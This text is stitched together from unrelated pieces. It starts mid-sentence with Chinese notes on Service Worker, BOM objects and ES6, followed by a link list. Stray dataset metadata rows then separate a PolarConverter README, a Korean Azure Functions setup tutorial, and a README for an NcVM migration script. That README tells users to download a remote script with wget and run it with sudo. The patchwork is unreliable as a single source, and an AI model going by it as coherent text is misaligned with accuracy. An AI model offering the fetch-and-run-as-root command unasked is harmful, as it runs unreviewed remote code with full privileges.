Sprite、文件的合并压缩、异步加载、资源缓存等等。其实我们绝大部分情况是在干一件事情,那就是尽量降低一个页面的网络请求成本从而缩短页面加载资源的时间并降低用户可感知的延时。当然减少用户可感知的延时也不仅仅是在网络请求成本层面,还有浏览器渲染效率,代码质量等等。 **那什么是 Service Worker?** 浏览器中的 javaScript 都是运行在一个单一主线程上的,在同一时间内只能做一件事情。随着 Web 业务不断复杂,我们逐渐在 js 中加了很多耗资源、耗时间的复杂运算过程,这些过程导致的性能问题在 WebApp 的复杂化过程中更加凸显出来。 W3C 组织早早的洞察到了这些问题可能会造成的影响,这个时候有个叫 **Web Worker 的 API** 被造出来了,这个 **API 的唯一目的就是解放主线程,Web Worker 是脱离在主线程之外的,将一些复杂的耗时的活交给它干,完成后通过 postMessage 方法告诉主线程,而主线程通过 onMessage 方法得到 Web Worker 的结果反馈**。 一切问题好像是解决了,但 **Web Worker 是临时的,每次做的事情的结果还不能被持久存下来**,如果下次有同样的复杂操作,还得费时间的重新来一遍。那我们能不能有一个Worker 是一直持久存在的,并且随时准备接受主线程的命令呢?基于这样的需求推出了最初版本的 Service Worker ,**Service Worker 在 Web Worker 的基础上加上了持久离线缓存能力**。当然在 **Service Worker 之前也有在 HTML5 上做离线缓存的 API 叫 AppCache**, 但是 AppCache 存在很多 不能忍受的缺点。 W3C 决定 AppCache 仍然保留在 HTML 5.0 Recommendation 中,在 HTML 后续版本中移除。 Service Worker 有以下功能和特性: - 一个独立的 worker 线程,独立于当前网页进程,有自己独立的 worker context。 - 一旦被 install,就永远存在,除非被手动 unregister - 用到的时候可以直接唤醒,不用的时候自动睡眠 - 可编程拦截代理请求和返回,缓存文件,缓存的文件可以被网页进程取到(包括网络离线状态) - 离线内容开发者可控 - 能向客户端推送消息 - 不能直接操作 DOM - 必须在 HTTPS 环境下才能工作 - 异步实现,内部大都是通过 Promise 实现 #### BOM相关 ***window对象*** BOM的核心对象是window,它表示浏览器的一个实例。在浏览器中,window对象有双重角色,即是通过js访问浏览器窗口的一个接口,又是ECMAScript规定的Global对象,因此所有在全局作用域中声明的变量,函数都会变成window对象的属性和方法。 但是定义的全局变量和在window对象上直接定义属性还是有区别的,即全局变量不能通过delete删除,而直接在window对象上定义的可以: ```js aa = 22 window.bb = 33 delete aa // false delete window.bb // true console.log(window.aa) // 22 console.log(window.bb) // undefined ``` 主要原因便是默认的属性描述符在作怪,如下 ```js // 参数一是属性所在的对象,参数二是属性名 Object.getOwnPropertyDescriptor(window, 'aa') configurable: false // 这里是false,表示描述符不可改变,切不可从对象上删除 enumerable: true value: 22 writable: true // 定义属性描述符,参考:Object.defineProperty(obj, prop, descriptor) ``` 另外直接访问未声明的变量会报错,但通过window来访问,则不会报错(因为这相当于一次属性查询) ***窗口及框架*** 如果页面中包含框架,则每个框架都有自己的window对象,并且保存在frames集合中,可以通过索引(从0开始,从左向右,从上到下)或框架名来访问相应的window对象,每个window对象都有一个name属性,其中包括框架的名称。如下注意这里不是`iframe`,另外body标签是没有的。 [iframe和frame及frameset的区别][diffBetweenIframe&frameUrl] ```html <!DOCTYPE html> <head> <title>多个iframe的demo</title> </head> <!-- <body> --> <frameset rows="160,*"> <frame src="frame.html" name="topFrame"></frame> <frameset cols="25%,50%,25%"> <frame src="frame_a.htm" name="a"/> <frame src="frame_b.htm" name="b"/> <frame src="frame_c.htm" name="c"/> </frameset> </frameset> <!-- </body> --> </html> ``` 对于上面多框架页面,所有的框架实例都保存在frames集合中,可以如下几种方式访问第一个框架,其他一样。 ```js window.frames[0] window.frames['topFrame'] top.frames[0] top.frames['topFrame'] frames[0] frames['topFrame'] ``` **注意:**top始终指向最高(最外层)的框架,也就是浏览器窗口,使用它可以确保,在一个框架中访问另外一个框架。而对于在一个框架内的代码来说,其中的window对象指向的都是那个框架的特定实例,而非最高层的框架。 与top相对的是parent对象,它始终指向当前框架的直接上层框架。另外与框架相关的另一个self对象,始终指向window对象。引入self的目的只是为了与top和parent对象对应起来。所有这些都是window对象的属性,因此可以将不同层次的window对象连接起来。 ```js self === window // true // 不同层次window对象连接 window.parent.parent.frames[0] ``` 在使用框架的情况下,浏览器中存在多个Global对象,在每个框架中定义的全局变量自动成为框架中window对象的属性,由于每个window对象都包含原生类型的构造函数,因此每个框架都有一套自己的构造函数,这些构造函数一一对应,但并不相等。例如:top.Object并不等于top.frames[0].Object,这个问题会影响到对跨框架传递的对象使用instanceof操作符。 ***导航和打开窗口*** window.open()方法返回的是新窗口的引用,引用对象和其他window对象相似,该方法既可以导航到一个特定的URL,也可以打开一个新的浏览器窗口。有四个参数: - 参数一:要加载的URL - 参数二:窗口目标(可以自定义名,也可以用'_black'则每次都是新页面,还有'_self','_top','_parent') - 参数三:一个设置窗口样式的特性字符串(比如新窗口是否全屏,大小等,逗号分开) - 参数四:新页面是否取代浏览器历史记录中当前加载页面的布尔值(不觉明历) ```js // _self是在当前页打开,此时height,width无效,保持和原始窗口大小一致, // 参数4不觉明历,history对象的长度无论参数四是true还是false,每打开一次length就会增加1 window.open('http://www.baidu.com','_self','height=400,width=400',true) // 当使用_black,_self,_top,_parent时,新打开的窗口name为空 // 当自定义命名时,每次都打开同一个命名的页面。 // 如果参数二并不是一个已经存在的窗口或框架,那么就会根据参数三来创建一个新窗口或新标签页 // 如果没有参数三,就会打开一个带有全部默认设置的新浏览器窗口 // 在不打开新窗口的情况下,会忽略参数三 ``` window.open会返回一个指向新窗口的引用,对于新窗口打开的页面,可以调用这个引用的close方法关闭新窗口,还可以调整大小及位置 ```js var newWindow = window.open('http://www.baidu.com','_blank','height=400,width=400',true) newWindow.resizeTo(500,500) // 改变大小(可能被禁用) newWindow.resizeBy(100,100) // 增量改变(可能被禁用) newWindow.moveTo(100,100) // 移动位置(可能被禁用) newWindow.close() // 关闭 // 另外新创建的window对象有opener属性,指向打开它的原始窗口对象,且只在弹窗窗口中的最外层window对象(top)中有定义, var newWindow = window.open('http://www.baidu.com','_blank','height=400,width=400',true) newWindow.opener === window // true ``` 有些浏览器会在独立的进程中运行每个标签页,当一个标签页打开另一个标签页时,如果两个window对象之间需要彼此通信,那么新标签页就不能运行在独立的进程中。在chrome中,将新创建的标签页的opener属性设置为null,即表示在单独的进程中运行标签页。一旦断了联系将无法恢复。 ***location*** location是最有用的BOM对象之一,提供了与当前窗口中加载的文档有关的信息,还提供一些导航功能。location是特殊的对象,既是window对象的属性,也是document对象的属性,如下 ```js window.location === document.location // true ``` 另外,location的用途不只表现它保存当前文档的信息,还表现在它将URL解析为独立的片段(比如hash,hostname,href,search等) ```js // 手动解析查询字符串 function getQueryStringArgs(){ let qs = location.search.length > 0 ? location.search.substring(1) : ''; let args = Object.create(null); let items = qs.length ? qs.split('&') : []; let name = null, value = null, i = 0, len = items.length; for(i = 0 ;i < len ; i++){ let item = items[i].split('=') name = decodeURIComponent(item[0]) value = decodeURIComponent(item[1]) if(name.length){ args[name] = value } } return args; } ``` 使用location对象可以更改浏览器的位置 ```js location.assign(URL) // 等价于 window.location = URL location.href = URL ``` 使用location.reload可以重新加载页面,如果不传参则可能从缓存里加载(效率高),如果传true则从服务器重新加载 ```js location.reload() // 可能从缓存中加载 location.reload(true) // 从服务器重新加载 ``` ***注册处理程序*** 假如给网页注册处理程序,其实相当于扩展网页的能力。。。如果是注册处理RSS阅读器的处理程序,其实就是让网页具有处理RSS的能力,进而浏览器可以打开RSS相关的资源 ```js navigator.registerProtocolHandler(protocol, url, title) ``` ***screen*** 有时候需要看看屏幕的分辨率,可以使用window.screen,里面的height和width便是高度和宽度的分辨率。当然还有其他的一些参数 ***history*** history是window对象的属性,因此每个浏览器窗口,每个标签页乃至每个框架(比如iframe),都有自己的history对象与特定的window对象关联。但出于安全,无法得知具体的URL,但有访问列表,同样可以在不知URL的情况下实现后退和前进 ```js history.go(2) // 前进两页 history.go(-2) // 后退两页 // 可以传递字符串,表示跳转到历史记录中包含该字符串的第一个位置,可能前进可能后退 history.go('test.com') // go的简写方式 history.back() // 相当于后退键 history.forward() // 相当于前进键 ``` #### ***ES6+集锦*** ES6 规范定义了一个新概念,叫作 TDZ(Temporal Dead Zone,暂时性死区)。 **TDZ**指的是由于代码中的变量还没有初始化而不能被引用的情况。 对此,最直观的例子是 ES6 规范中的 let 块作用域: ```js { a = 2; // ReferenceError! let a; } ``` a = 2试图在let a初始化a之前使用该变量(其作用域在{ .. }内),这里就是a的 TDZ,会产生错误。 有意思的是,对未声明变量使用 typeof 不会产生错误(参见第 1 章),但在 TDZ 中却会报错: ```js { typeof a; // undefined typeof b; // ReferenceError! (TDZ) let b; } ``` 1. 支付逻辑, 2. 埋点逻辑 3. docker 4. 小程序 5. 部署脚本 6. 框架 7. cas单点登录 8. vue源码 9. ts 10. jenkins 11. 数据结构及算法 13. 微信sdk,授权,支付,分享 14. 唤起app 15. 线程,进程,微任务,宏任务 16. Socket协议 17. http5,css3,canvas,常见攻击,websocket,pwa, #### ***svg,canvas,js,css动画*** canvas是祯动画,意味着每个动作都是一个截图,最后是把截图播放……感觉那么多祯很耗费性能,但它有分层的概念,意味着如果有这层不变,可以重复利用……另外就是canvas没有具体元素的概念,都是坐标位置,因此就无法对某个元素添加事件……而svg不但是矢量图,还有具体的元素,因此可以基于元素做些操作,而css3动画很大程度上是浏览器封装实现的,再加上gpu加速,因此性能上很好,但缺点是无法做多个元素组合的动画(比如两个人打架),因为两个元素的时间很难放在同一个起点上……而js动画的,就比较好操作了…… #### docker使用 参考:[docker从入门到实践](https://yeasy.gitbooks.io/docker_practice/image/dockerfile/cmd.html) #### 常用链接 [cssPxDevicePxUrl]: https://github.com/jawil/blog/issues/21 [androidViewportWidthSizeUrl]: http://viewportsizes.com [taoBaoFlexibleUrl]: https://www.kancloud.cn/chandler/web_app/353540 [commonRegexUrl]: https://juejin.im/post/5b96a8e2e51d450e6a2de115 [allRegexUnitUrl]: http://tool.oschina.net/uploads/apidocs/jquery/regexp.html [mdnRegexUrl]: https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Guide/Regular_Expressions [justTalkSandboxUrl]: http://www.nowamagic.net/javascript/js_SandBox.php [JavaScriptSandboxUrl]: https://segmentfault.com/a/1190000006808445 <!-- CSS相关 --> [marginCollapsingUrl]: https://developer.mozilla.org/zh-CN/docs/Web/CSS/CSS_Box_Model/Mastering_margin_collapsing [w3choolCssSelectorUrl]: http://www.w3school.com.cn/cssref/css_selectors.ASP [frontEndDatabaseUrl]: https://leohxj.gitbooks.io/front-end-database/index.html [tenDesignStylesUrl]: https://juejin.im/entry/58c280b1da2f600d8725b887 <!-- --> [mdnHttpStatusCodesUrl]: https://developer.mozilla.org/zh-CN/docs/Web/HTTP/Status [html5MdnUrl]: https://developer.mozilla.org/zh-CN/docs/Web/Guide/HTML/HTML5 [html5&css3NewFeatureUrl]: https://yq.aliyun.com/articles/610581 [indexedDB(ruanyifeng)]: http://www.ruanyifeng.com/blog/2018/07/indexeddb.html [whatIsSocketUrl]: http://www.cnblogs.com/skynet/archive/2010/12/12/1903949.html [frontEndOptimizeUrl]: https://juejin.im/post/5a966bd16fb9a0635172a50a [vueOptimizeUrl]: https://juejin.im/post/5b960fcae51d450e9d645c5f [vue3.0OptimizeUrl]: https://yuccie.github.io/jsArt/2018/11/vue3/ [eightCssOptimizeUrl]: https://juejin.im/post/5b6133a351882519d346853f [vueLazeloadTheoryUrl]: https://arron-chen.github.io/2017/10/27/vue-lazyload/ <!-- linux相关 --> [unix&Linux&MacStoryUrl]: https://blog.csdn.net/zhanghow/article/details/53542397 [unix&LinuxDiffUrl]: https://news.mydrivers.com/1/580/580273.htm [aboutCdnUrl]: http://genie88.github.io/2015/11/03/talk-about-content-delivery-network-and-caches/ [aboutCdnHuiYuanUrl]: https://juejin.im/post/5af46498f265da0b8d41f6a3 [aboutConsultCacheUrl]: https://imweb.io/topic/5795dcb6fb312541492eda8c [aboutForceCacheUrl]: https://juejin.im/entry/5ad86c16f265da505a77dca4 [browserCacheAnalyseUrl]: https://github.com/zhengweikeng/blog/issues/5 [exports&exportDiffUrl]: https://github.com/aooy/blog/issues/5 [tenMinuteReadDockerUrl]: https://www.ithome.com/html/win10/402469.htm [k8sAndDockerUrl]: http://dockone.io/article/2682 [babelChineseDocsUrl]: https://www.babeljs.cn/docs/plugins [SuperAgentAndRequestUrl]: http://web.jobbole.com/94160/ [crossSiteUrl]: https://juejin.im/post/5c23993de51d457b8c1f4ee1 [xssExampleUrl]: https://blog.sqreen.io/xss-in-vue-js/ [xssAttackDecodeURL]: http://www.hangge.com/blog/cache/detail_1774.html [PWADocumentUrl]: https://lavas.baidu.com/pwa/README [crossSiteJWTUrl]: http://www.ruanyifeng.com/blog/2018/07/json_web_token-tutorial.html [onePageReadSSOUrl]: https://cloud.tencent.com/developer/article/1330311 [frontEndProjectUrl]: https://www.zhihu.com/question/24558375 [howIUnderstandFrontEndProjectUrl]: https://juejin.im/post/58ac334e8d6d810058c103e0 [allFrontEndResourceUrl]: https://juejin.im/entry/58063ed52e958a0055ece967 [bigCompanyHowToDeployFrontEndCodeUrl]: https://www.zhihu.com/question/20790576 [nextTickAndMutationObserverUrl]: https://github.com/Ma63d/vue-analysis/issues/6 [frontEndResourceOneUrl]: https://yuchengkai.cn/docs/frontend/#内置类型 [middleAndHighLevelIterviewUrl]: https://juejin.im/post/5c64d15d6fb9a049d37f9c20?utm_source=gold_browser_extension [whatImpliedTransformHappened]: https://juejin.im/post/5c6adcd7e51d4542331c5a2e?utm_source=gold_browser_extension [quickSortUrl(ruanyifeng)]: http://www.ruanyifeng.com/blog/2011/04/quicksort_in_javascript.html [vueTwoDirectionDataBindUrl]: https://github.com/DMQ/mvvm [vueTheroySkillUrl]: https://ustbhuangyi.github.io/vue-analysis/reactive/reactive-object.html#initstate [vueSourceCodeAnalyzeUrl]: https://github.com/Ma63d/vue-analysis/issues/1 [popularReadVueTwoDirectionDataBindUrl]: https://blog.csdn.net/sir1241/article/details/79208038 [usualWebSecurityUrl]: https://zoumiaojiang.com/article/common-web-security/ [addOperatorUrl]: https://www.w3cplus.com/javascript/javascriptss-addition-operator-demystified.html [minusOperatorUrl]: http://www.wenjiangs.com/article/javascript-string-number.html '减号运算符' [nullAndundefined(阮一峰)]: http://www.ruanyifeng.com/blog/2014/03/undefined-vs-null.html [jsEngineerShouldKonw33Concept]: https://zhuanlan.zhihu.com/p/48049957 [howRexExpWorkUrlRuanYiFeng]: http://javascript.ruanyifeng.com/stdlib/regexp.html [fastClickUseInstruction]: https://github.com/ftlabs/fastclick [aboutJsYouNeedKonw]: https://www.kancloud.cn/xiak/quanduan/369159 [diffBetweenIframe&frameUrl]: https://www.haorooms.com/post/html_frameset_contro 'iframe及frame的区别' [handleScrollTabURL]: https://github.com/pod4g/tool/wiki/%E7%A7%BB%E5%8A%A8%E7%AB%AF%E6%BB%9A%E5%8A%A8%E7%A9%BF%E9%80%8F%E9%97%AE%E9%A2%98 '滚动穿透' [howBrowsersworkUrl]: https://www.html5rocks.com/zh/tutorials/internals/howbrowserswork/ '浏览器的工作原理:新式网络浏览器幕后揭秘' [aboutBrowserDefaultUrl]: https://stackoverflow.com/questions/14496694/whats-default-value-of-cache-control '浏览器的默认策略'
29.199086
383
0.736032
yue_Hant
0.67542
6f4513e0ff1af225796b184fd520c12d82689613
275
md
Markdown
README.md
goldnarms/PolarConverter
860fff51b4723431e7522798ed42ee544fb526dc
[ "MIT" ]
null
null
null
README.md
goldnarms/PolarConverter
860fff51b4723431e7522798ed42ee544fb526dc
[ "MIT" ]
null
null
null
README.md
goldnarms/PolarConverter
860fff51b4723431e7522798ed42ee544fb526dc
[ "MIT" ]
null
null
null
PolarConverter ============== Converting polar files to endomondo and strava compatible formats External apps https://console.developers.google.com/project https://apps.twitter.com/app/6309235/keys https://developers.facebook.com/apps/128362510636193/settings/advanced/
21.153846
71
0.781818
kor_Hang
0.341104
6f47234729aaa6115b50cc7eb8adf3018c4eeeed
3,490
md
Markdown
articles/azure-resource-manager/custom-providers/tutorial-custom-providers-function-setup.md
youngick/azure-docs.ko-kr
b6bc928fc360216bb122e24e225a5b7b0ab51d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/azure-resource-manager/custom-providers/tutorial-custom-providers-function-setup.md
youngick/azure-docs.ko-kr
b6bc928fc360216bb122e24e225a5b7b0ab51d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/azure-resource-manager/custom-providers/tutorial-custom-providers-function-setup.md
youngick/azure-docs.ko-kr
b6bc928fc360216bb122e24e225a5b7b0ab51d7e
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Azure Functions 설정 description: 이 자습서에서는 Azure 함수 앱을 만들어서 Azure 사용자 지정 공급자에서 작동하도록 설정하는 방법을 살펴봅니다. author: jjbfour ms.topic: tutorial ms.date: 06/19/2019 ms.author: jobreen ms.openlocfilehash: 55554678047faeedd16b78dea61a42d50fd59491 ms.sourcegitcommit: 78ecfbc831405e8d0f932c9aafcdf59589f81978 ms.translationtype: HT ms.contentlocale: ko-KR ms.lasthandoff: 01/23/2021 ms.locfileid: "99822358" --- # <a name="set-up-azure-functions-for-azure-custom-providers"></a>Azure 사용자 지정 공급자를 위한 Azure Functions 설정 사용자 지정 공급자는 Azure와 엔드포인트 사이의 계약입니다. 사용자 지정 공급자를 사용하면 Azure에서 워크플로를 변경할 수 있습니다. 이 자습서에서는 사용자 지정 공급자 엔드포인트로 작동하도록 Azure 함수 앱을 설정하는 방법을 보여줍니다. ## <a name="create-the-azure-function-app"></a>Azure 함수 앱 만들기 > [!NOTE] > 이 자습서에서는 Azure 함수 앱을 사용하는 간단한 서비스 엔드포인트를 만듭니다. 그러나 사용자 지정 공급자는 공개적으로 액세스할 수 있는 엔드포인트를 사용할 수 있습니다. 대안에는 Azure Logic Apps, Azure API Management 및 Azure App Service의 Web Apps 기능이 포함됩니다. 이 자습서를 시작하려면 [Azure Portal에서 첫 번째 Azure 함수 앱 만들기](../../azure-functions/functions-get-started.md) 자습서를 먼저 수행해야 합니다. 이 자습서에서는 Azure Portal에서 수정할 수 있는 .NET Core 웹후크 함수를 만듭니다. 또한 현재 자습서의 기반이 됩니다. ## <a name="install-azure-table-storage-bindings"></a>Azure Table Storage 바인딩 설치 Azure Table Storage 바인딩을 설치하려면 다음을 수행합니다. 1. HttpTrigger의 **통합** 탭으로 이동합니다. 1. **+ 새 입력** 을 선택합니다. 1. **Azure Table Storage** 를 선택합니다. 1. 아직 설치되지 않은 경우 Microsoft.Azure.WebJobs.Extensions.Storage 확장을 설치합니다. 1. **테이블 매개 변수 이름** 상자에 **tableStorage** 를 입력합니다. 1. **테이블 이름** 상자에 **myCustomResources** 를 입력합니다. 1. **저장** 을 선택하여 업데이트된 입력 매개 변수를 저장합니다. ![테이블 바인딩을 보여주는 사용자 지정 공급자 개요](./media/create-custom-provider/azure-functions-table-bindings.png) ## <a name="update-restful-http-methods"></a>RESTful HTTP 메서드 업데이트 사용자 지정 공급자 RESTful 요청 메서드를 포함하도록 Azure 함수를 설정하려면 다음을 수행합니다. 1. HttpTrigger의 **통합** 탭으로 이동합니다. 1. **선택한 HTTP 메서드** 에서 **GET**, **POST**, **DELETE** 및 **PUT** 을 선택합니다. ![HTTP 메서드를 보여주는 사용자 지정 공급자 개요](./media/create-custom-provider/azure-functions-http-methods.png) ## <a name="add-azure-resource-manager-nuget-packages"></a>Azure Resource Manager NuGet 패키지 추가 > [!NOTE] > C# 프로젝트 파일이 프로젝트 디렉터리에 없으면 수동으로 추가할 수 있습니다. 또는 Microsoft.Azure.WebJobs.Extensions.Storage 확장이 함수 앱에 설치된 후에 표시됩니다. 다음으로, 유용한 NuGet 라이브러리를 포함하도록 C# 프로젝트 파일을 업데이트합니다. 이러한 라이브러리를 사용하면 사용자 지정 공급자로부터 들어오는 요청을 더 쉽게 구문 분석할 수 있습니다. [포털에서 확장을 추가하는](../../azure-functions/functions-bindings-register.md) 단계에 따라 다음 패키지 참조를 포함하도록 C# 프로젝트를 업데이트합니다. ```xml <PackageReference Include="Microsoft.Azure.WebJobs.Extensions.Storage" Version="3.0.4" /> <PackageReference Include="Microsoft.Azure.Management.ResourceManager.Fluent" Version="1.22.2" /> <PackageReference Include="Microsoft.Azure.WebJobs.Script.ExtensionsMetadataGenerator" Version="1.1.*" /> ``` 다음 XML 요소는 C# 프로젝트 파일의 예제입니다. ```xml <Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> <TargetFramework>netstandard2.0</TargetFramework> <WarningsAsErrors /> </PropertyGroup> <ItemGroup> <PackageReference Include="Microsoft.Azure.WebJobs.Extensions.Storage" Version="3.0.4" /> <PackageReference Include="Microsoft.Azure.Management.ResourceManager.Fluent" Version="1.22.2" /> <PackageReference Include="Microsoft.Azure.WebJobs.Script.ExtensionsMetadataGenerator" Version="1.1.*" /> </ItemGroup> </Project> ``` ## <a name="next-steps"></a>다음 단계 이 자습서에서는 Azure 사용자 지정 공급자 엔드포인트로 작동하도록 Azure 함수 앱을 설정합니다. RESTful 사용자 지정 공급자 엔드포인트를 작성하는 방법을 알아보려면 [자습서: RESTful 사용자 지정 공급자 엔드포인트 작성](./tutorial-custom-providers-function-authoring.md)을 참조하세요.
42.560976
220
0.740974
kor_Hang
0.999951
6f4729ffdb5ec7fe289d985f486fcb927e222d5b
3,264
md
Markdown
articles/security/fundamentals/best-practices-and-patterns.md
RobAaldijk/azure-docs.nl-nl
519c7fc80075795af2670d665d1d93078faf7a87
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security/fundamentals/best-practices-and-patterns.md
RobAaldijk/azure-docs.nl-nl
519c7fc80075795af2670d665d1d93078faf7a87
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/security/fundamentals/best-practices-and-patterns.md
RobAaldijk/azure-docs.nl-nl
519c7fc80075795af2670d665d1d93078faf7a87
[ "CC-BY-4.0", "MIT" ]
null
null
null
--- title: Aanbevolen procedures voor beveiliging en patronen-Microsoft Azure | Microsoft Docs description: Dit artikel is een koppeling naar de aanbevolen procedures en patronen voor beveiliging voor verschillende Azure-resources. services: azure-security documentationcenter: na author: TerryLanfear manager: barbkess editor: TomSh ms.assetid: 1cbbf8dc-ea94-4a7e-8fa0-c2cb198956c5 ms.service: security ms.subservice: security-fundamentals ms.devlang: na ms.topic: conceptual ms.tgt_pltfrm: na ms.workload: na ms.date: 5/03/2019 ms.author: terrylan ms.openlocfilehash: f4a3b2afd8b1a5ffdbb1fe0db1c3e345a9c99154 ms.sourcegitcommit: 17b36b13857f573639d19d2afb6f2aca74ae56c1 ms.translationtype: MT ms.contentlocale: nl-NL ms.lasthandoff: 11/10/2020 ms.locfileid: "94412609" --- # <a name="azure-security-best-practices-and-patterns"></a>Aanbevolen procedures en patronen voor Azure-beveiliging De onderstaande artikelen bevatten aanbevolen procedures voor beveiliging bij het ontwerpen, implementeren en beheren van uw cloud oplossingen met behulp van Azure. Deze aanbevolen procedures zijn afkomstig uit onze ervaring met Azure-beveiliging en de ervaringen van klanten zoals u. De aanbevolen procedures zijn bedoeld als resource voor IT-professionals. Dit kan ontwerpers, architecten, ontwikkel aars en testers zijn die beveiligde Azure-oplossingen bouwen en implementeren. * [Best practices voor beveiliging van Azure-grenzen](./network-best-practices.md#adopt-a-zero-trust-approach) * [Best practices voor Azure-databasebeveiliging](../../azure-sql/database/security-best-practice.md) * [Best practices van Azure voor gegevensbeveiliging en versleuteling](data-encryption-best-practices.md) * [Best practices voor beveiliging voor identiteitsbeheer en toegangsbeheer in Azure](identity-management-best-practices.md) * [Best practices voor Azure-netwerkbeveiliging](network-best-practices.md) * [Best practices voor operationele Azure-beveiliging](operational-best-practices.md) * [Best practices voor Azure PaaS](paas-deployments.md) * [Best practices voor Azure Service Fabric-beveiliging](service-fabric-best-practices.md) * [Best practices voor Azure VM-beveiliging](iaas.md) * [Een beveiligde hybride netwerkarchitectuur implementeren in Azure](/azure/architecture/reference-architectures/dmz/secure-vnet-hybrid) * [Best practices voor Internet of Things-beveiliging](../../iot-fundamentals/iot-security-best-practices.md) * [PaaS-databases beveiligen in Azure](paas-applications-using-sql.md) * [PaaS-toepassingen voor web en mobiel beveiligen met Azure App Service](paas-applications-using-app-services.md) * [PaaS-toepassingen voor web en mobiel beveiligen met Azure Storage](paas-applications-using-storage.md) * [Best practices voor beveiliging voor IaaS-workloads in Azure](iaas.md) De [Best practices voor de beveiliging van](https://azure.microsoft.com/resources/security-best-practices-for-azure-solutions) het technisch document voor Azure-oplossingen is een verzameling van de best practices voor beveiliging die in de bovenstaande artikelen worden weer gegeven. [Het technisch document downloaden](https://azure.microsoft.com/mediahandler/files/resourcefiles/security-best-practices-for-azure-solutions/Azure%20Security%20Best%20Practices.pdf)
66.612245
284
0.82261
nld_Latn
0.972245
6f475a19cd1c526b52eba73a4540026b068a3a0c
220
md
Markdown
github-actions/wixel-build/README.md
kaikok/wixel-sdk
fdb99b02bc9d77438e4c067015f89da965ff36a0
[ "MIT" ]
null
null
null
github-actions/wixel-build/README.md
kaikok/wixel-sdk
fdb99b02bc9d77438e4c067015f89da965ff36a0
[ "MIT" ]
null
null
null
github-actions/wixel-build/README.md
kaikok/wixel-sdk
fdb99b02bc9d77438e4c067015f89da965ff36a0
[ "MIT" ]
null
null
null
# Wixel build action This action provides a docker container with the SDCC build tools to compile the Wixel firmware. ## Inputs No inputs required. ## Outputs No outputs generated. ## Example usage Not published.
13.75
96
0.759091
eng_Latn
0.993302
6f47e0dd2204c99630490c9d9001df2847b54ed7
4,677
md
Markdown
README.md
szaimen/NcVM-migration
f9b19f30914169a82be3072220960c9436b75e43
[ "MIT" ]
1
2021-02-05T05:32:25.000Z
2021-02-05T05:32:25.000Z
README.md
szaimen/NcVM-migration
f9b19f30914169a82be3072220960c9436b75e43
[ "MIT" ]
3
2020-08-14T23:25:35.000Z
2021-11-29T21:20:10.000Z
README.md
szaimen/NcVM-migration
f9b19f30914169a82be3072220960c9436b75e43
[ "MIT" ]
null
null
null
# NcVM-migration A shell script for migrating the [NcVM](https://github.com/nextcloud/vm) between different Ubuntu Versions. **Please note:** You are free to run this script at your personal risk. I am not responsible for any damaged systems and will not provide any personal support. So please keep backups! ## How to run? Connect to your NcVM via ssh and run: `wget https://raw.githubusercontent.com/szaimen/NcVM-migration/master/migration.sh && sudo bash migration.sh` That's it! ## How does it work? - The whole backup-restore functionality is based on the great scripts provided by DecaTec, please see here: https://codeberg.org/DecaTec/Nextcloud-Backup-Restore - The migration.sh script produces automatically the backup files and a restore.sh script, which can be called from the new NcVM after running the startup-scrip and restores all Nextcloud-relevant files and data, which is the database, the datadirectory and the Nextcloud-folder to the new NcVM. - In the last step of the restore.sh script, are you asked if you want to activate tls on the new server, which is the only step left, to make the new server work again. - After that, you can simply execute the by the NcVM provided scripts again, to get additional apps working again. ## In a nutshell 1. Create a backup of your NcVM 2. Mount a SMB-share to your NcVM using the built-in smbmount script by running<br/>`sudo bash /var/scripts/menu.sh` -> `Additional Apps` -> `SMB-mount` 3. [Execute](#how-to-run) the migration.sh script 4. [Download](https://www.hanssonit.se/nextcloud-vm/) a new NcVM 5. Import and start the new NcVM and run the startup-script 6. Mount the same SMB-share to the new NcVM using the built-in smbmount script again (see point 2) 7. Execute the by the migration.sh script produced restore.sh script on the new NcVM 8. Logg in to the restored Nextcloud using the local ipaddress of the new NcVM in a Browser and test if everything works as expected<br/>(e.g. check the Nextcloud logs, test all installed Nextcloud apps, etc.) 9. If yes, enable lets encrypt by running `sudo bash /var/scripts/menu.sh` -> choose `Server Configuration` -> choose `Activate TLS` 10. If needed, manually restore crontab entries, fstab entries, etc. 11. Reinstall NcVM apps by running `sudo bash /var/scripts/menu.sh` -> `Additional Apps` 12. This should be it 🎉 ## Limitations - You have to connect a SMB-mount by executing the by the NcVM provided smbmount script before running both - migration.sh & restore.sh - scripts since you need to store the backup files outside of the NcVM to be able to restore them to a new NcVM afterwards. - If you have mounted and used SMB-mounts in the NcVM before, you need to restore them manually in the correct order at the correct mountpoint before executing the restore.sh scipt - The migration.sh script only works on NcVM based machines with Ubuntu 18.04 and php 7.2 and the restore.sh script only works on NcVM based machines with Ubuntu 20.04 and php 7.4. - Only the default NcVM configuration is supported. - At least Nextcloud 18 is needed to run the migration.sh script - Apps, that are provided by the NcVM and were installed on your old system will not be automatically installed by the restore.sh script, since they can get easily reinstalled by running the by the NcVM provided scripts. - Backup of official Bitwarden is not supported. - Non-standard customization on the old NcVM will not get backed up and restored, and has to get manually redone on the new NcVM after restoring. - The crontabs are saved in a no-restore folder. They are backed up here, so that you can look at them to better remember which cronjobs where running in your old system. You need to manually restore missing cronjobs, since that can't be automated. - The update.sh file is backed up in this folder, as well, since you could possibly have changed something in there, which has to get manually restored, if needed. - The fstab is also getting backed up in the no-restore folder so that you can see your old configuration, which is helpful e.g. to be able to manually restore the correct order of smb-mounts, etc. ## Bitwarden_rs - If you have Bitwarden_rs running on your old NcVM, the migration.sh script will automatically backup all needed files and create a bitwarden-restore.sh script. ### Bitwarden-restore in a nutshell 1. Execute all steps of [In a nutshell](#in-a-nutshell) 2. Install Bitwarden_rs on the new NcVM by running 'sudo bash /var/scripts/menu.sh' and choosing Additional Apps -> Bitwarden -> Bitwarden_rs and enter during the installation the Bitwarden_rs-Domain of your old Bitwarden_rs installation 3. Execute bitwarden-restore.sh 4. That's it 🎉
89.942308
295
0.77956
eng_Latn
0.999318
6f481c9b7e32067b56d81b836becfebf81c1fe6e
597
md
Markdown
Labs/Big Data and Analytics/Hadoop on Azure HDInsight/HDInsight Hadoop HOL.md
365Academic/AcademicContent
8f35d9bb8a7c9054a134f6c69bf125e64be8f7f2
[ "MIT" ]
615
2020-03-26T18:21:33.000Z
2022-03-31T23:58:18.000Z
